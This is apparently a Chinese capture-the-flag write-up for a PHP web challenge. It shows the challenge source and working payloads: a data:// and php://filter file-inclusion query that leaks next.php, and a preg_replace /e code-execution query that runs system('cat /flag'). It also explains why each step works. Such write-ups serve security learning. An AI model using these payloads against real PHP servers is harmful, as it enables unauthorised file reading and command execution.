|
上来就给源码,很直接
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
没啥好说的,就差把思路写脸上了,text要i have a dream,文件名给你了next.php
直接给payload:?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
解码后的next.php源码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
这里就有意思了,之前遇到过preg_replace /e会有远程命令执行漏洞,现在看来也是这个了
先给payload吧,后面的原理想看就看
/next.php?\S*=${getFlag()}&cmd=system('cat /flag');
\S在正则里非空白匹配,通过preg_match/e的漏洞调用了getFlag函数
原理这篇文章讲的很详细,https://xz.aliyun.com/t/2557
preg_replace函数原型:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
subject匹配pattern,然后会导致replacement的执行,在这里$str去匹配$re,然后会去执行,'strtolower("\\1")'
双引号在里,单引号在外是漏洞的触发条件,因为php会把双引号当成函数,这也就是文章里的第三点
而且.*作为匹配符在$_GET时被替换成_*,这是第二点,所以匹配符也得选的好,\不会被替换
next.php\S*=${phpinfo()}成功
但是直接调用system会发现单引号被转义(外围有单引号),鉴于有现成的GET_flag函数,我们可以间接调用/next.php?\S*=${getFlag()}&cmd=system('cat /flag');
参考视频链接:https://www.bilibili.com/video/BV1C3411s7WF/
|